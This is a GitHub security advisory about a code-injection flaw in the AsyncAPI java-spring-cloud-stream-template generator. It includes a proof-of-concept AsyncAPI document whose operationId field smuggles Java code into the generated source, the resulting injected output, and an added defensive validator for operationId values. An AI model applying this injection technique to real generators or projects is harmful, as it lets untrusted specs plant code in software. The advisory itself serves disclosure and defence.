GitHub Advisory Database: GHSA-XJ6R-2JPM-QVXP
History: Aug 25, 2021 - 2:45 p.m.

Code injection issue for java-spring-cloud-stream-template

Published: 2021-08-25 14:45:52
CWE: CWE-94
Source: GitHub Advisory Database (github.com)
Tags: code injection, java, spring, cloud stream, security issue, injection attack, asyncapi, command injection, customclass

CVSS2: 6.8
Attack Vector: NETWORK
Attack Complexity: MEDIUM
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: PARTIAL
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P

CVSS3: 8.7
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: HIGH
User Interaction: NONE
Scope: CHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: NONE
Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N

EPSS: 0.001
Percentile: 50.5%

The following was initially reported by @jonaslagoni:

Given the following command:
ag ./dummy.json @asyncapi/java-spring-cloud-stream-template --force-write --output ./output

With the following AsyncAPI document:

{
  "asyncapi": "2.0.0",
  "info": {
    "title": "Streetlight",
    "version": "1.0.0"
  },
  "defaultContentType": "json",
  "channels": {
    "security/audit/channel": {
      "description": "Channel for the turn on command which should turn on the streetlight",
      "parameters": {
        "streetlight_id": {
          "description": "The ID of the streetlight",
          "schema": {
            "type": "string"
          }
        }
      },
      "publish": {
        "operationId": "test() { System.out.println(\"injected\"); return test(0); }\n public Consumer<CustomClass> someothername",
        "message": {
          "name": "TurnonCommand",
          "payload": {
            "$ref": "#/components/schemas/CustomClass"
          }
        }
      }
    }
  },
  "components": {
    "schemas" : {
      "CustomClass": {
        "type": "object",
        "properties": {
          "prop": { 
              "type": "string"
          }
        }
      }
    }
  }
}

This changes the following output:

...
  @Bean
  public Consumer<CustomClass> test() {
    // Add business logic here.
    return null;
  }
...

to:

...
  @Bean
  public Consumer<CustomClass> test() { System.out.println("injected"); return someothername(); }
  public Consumer<CustomClass> someothername() {
    // Add business logic here.
    return null;
  }
...
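
Added example (not part of the advisory or the template's code): a pre-generation check that rejects any operationId that is not a plain Java identifier, since the report above shows that field reaching the generated method signature. The function name findUnsafeOperationIds, the strict ASCII identifier rule and the second sample channel are assumptions made for this illustration; it checks only operationId.

```javascript
// Added illustration; all names here are hypothetical, not from the template.
// Strict ASCII subset of Java identifiers: anything else is rejected.
const JAVA_IDENTIFIER = /^[A-Za-z_$][A-Za-z0-9_$]*$/;

// Java keywords and literals, which cannot be used as method names either.
const JAVA_RESERVED = new Set((
  'abstract assert boolean break byte case catch char class const continue ' +
  'default do double else enum extends final finally float for goto if ' +
  'implements import instanceof int interface long native new package ' +
  'private protected public return short static strictfp super switch ' +
  'synchronized this throw throws transient try void volatile while ' +
  'true false null'
).split(' '));

// Walk every channel's publish/subscribe operation and report each
// operationId that could not safely be emitted as a Java method name.
function findUnsafeOperationIds(doc) {
  const findings = [];
  const channels = (doc && doc.channels) || {};
  for (const [channelName, channel] of Object.entries(channels)) {
    for (const kind of ['publish', 'subscribe']) {
      const op = channel && channel[kind];
      if (!op || op.operationId === undefined) continue;
      const id = op.operationId;
      let reason = null;
      if (typeof id !== 'string') reason = 'not a string';
      else if (!JAVA_IDENTIFIER.test(id)) reason = 'not a plain Java identifier';
      else if (JAVA_RESERVED.has(id)) reason = 'Java reserved word';
      if (reason) findings.push({ channel: channelName, kind, operationId: id, reason });
    }
  }
  return findings;
}

// Constructed sample: the first operationId is the one from the report above;
// the second channel is a benign control added for this example.
const sampleDoc = {
  channels: {
    'security/audit/channel': { publish: { operationId:
      'test() { System.out.println("injected"); return test(0); }\n public Consumer<CustomClass> someothername' } },
    'lights/status': { subscribe: { operationId: 'receiveLightStatus' } },
  },
};

for (const f of findUnsafeOperationIds(sampleDoc)) {
  console.log(`${f.channel} ${f.kind}: ${f.reason}: ${JSON.stringify(f.operationId)}`);
}
```

Running such a check before invoking the generator, and failing the build on any finding, keeps an untrusted AsyncAPI document from shaping the generated source through this field.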

Affected configurations

Vulners node: asyncapi java-spring-cloud-stream-template, Range: 0.6.9
Vendor: asyncapi
Product: java-spring-cloud-stream-template
Version: *
CPE: cpe:2.3:a:asyncapi:java-spring-cloud-stream-template:*:*:*:*:*:*:*:*
